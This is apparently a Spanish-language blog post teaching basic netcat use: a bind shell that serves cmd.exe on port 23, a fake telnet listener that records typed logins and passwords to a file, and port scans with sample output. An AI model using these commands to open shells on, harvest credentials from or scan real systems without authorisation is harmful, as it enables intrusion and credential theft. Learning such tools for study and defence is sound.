Bueno intentare explicar una de las funciones principales del NC como son un pequeno sniffer, un scann de puertos y una shell remota espero sirva de algo este texto jejeje bueno empezemos..
Para ilustrar mejor como trabajamos con este programa, lo mejor es que pondre pequeños y practicos ejemplos y analizar su estructura para poder comprender
mejor como funciona y asi poder crear nuestras propias aplicaciones.
Shell Remota
Obtener un Shell rapidamente en una maquina remota usando la
opcion -l (Listen) conjuntamente con la opcion -e (ejecutar) , cuando el
proggie corre con estas variables y la coneccion es realizada, NetCat
ejecuta el programa elegido y se conecta a stdin y stdout del programa
en la coneccion la red.
nc -l -p 23 xxx.xxx.xxx.xx 23 -t -e cmd.exe
Este comando dejara NetCat escuchando el Puerto 23 (telnet) ,
cuando es conectado a traves del cliente, ejecutaran una Shell (cmd.exe).
la opcion -t le dice a NetCat que maneje cualquier negociacion que el
cliente pueda esperar….
Si esta conexiones realizada desde una maquina NT, el shell
correr los permisos del proceso que han generado a NetCat.
Sniffer:
Otra de las interesante posibilidades de netcat es su capacidad para
escuchar conecciones en cualquier puerto, pudiendo redireccionar todo el
trafico del mismo hacia un archivo o hacia pantalla, en este sencillo
ejemplo, podemos observar las bases de un sencillo sniffer en Windows:
C:\nc11nt>nc -v -v -L 127.0.0.1 -p 23
DNS fwd/rev mismatch: localhost != NKRA
listening on [any] 23 …
DNS fwd/rev mismatch: localhost != NKRA
connect to [127.0.0.1] from localhost [127.0.0.1] 1131
login: sniffado
password: jeje!!
Tambien podemos redireccionar toda la salida a un archivo e
irnos a realizar otras actividades ,ientras netcat hace su trabajo:
C:\nc11nt>nc -v -v -L -p 23 127.0.0.1 -t >login.txt
DNS fwd/rev mismatch: localhost != NKRA
listening on [any] 23 …
[Aqui viene la connecion.]
DNS fwd/rev mismatch: localhost != NKRA
connect to [127.0.0.1] from localhost [127.0.0.1] 1030
[Todo lo que escriba la conneccion se va al archivo login.txt]
sent 0, rcvd 42
La opcion L permite que netcat escuche nuevamente al terminar la coneccion
Scann de Puertos
Netcat puede ser utilizado como scanner, sus multiples opciones
le permiten realizar un gran numero de combinaciones, pudiendo realizar
Scannings en Puertos Random, en puertos conocidos, en modo ascendente o
descendente, con intervalos de tiempo, utilizando gateways para evitar
mostrar la IP fuente del Scanning, etc.
C:\nc11nt>nc -v -v -z 127.0.0.1 53 25 21
DNS fwd/rev mismatch: localhost != NKRA
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 25 (smtp): connection refused
localhost [127.0.0.1] 21 (ftp): connection refused
sent 0, rcvd 0: NOTSOCK
Pues si; aqui tienen un pequeño y primitivo scanner, se le
puede asignarle un rango de puertos:
C:\nc11nt>nc -v -v -z 127.0.0.1 1-53
DNS fwd/rev mismatch: localhost != darkstar
localhost [127.0.0.1] 53 (domain): connection refused
localhost [127.0.0.1] 52 (?): connection refused
localhost [127.0.0.1] 51 (?): connection refused
localhost [127.0.0.1] 50 (?): connection refused
localhost [127.0.0.1] 49 (?): connection refused
localhost [127.0.0.1] 48 (?): connection refused etc…
Volvemos con la opcion v (verbose) y la Opcion z (zero i/o)
que es usada para scanning, los puertos se lo especificamos al final del
IP del host, bien sea individuales separados por un espacio; o por un
rango de puertos.
Espero les sirva de algo este pequeño manualillo de algunos comandos del NC
Editado por mi NKRA sal2
No hay comentarios:
Publicar un comentario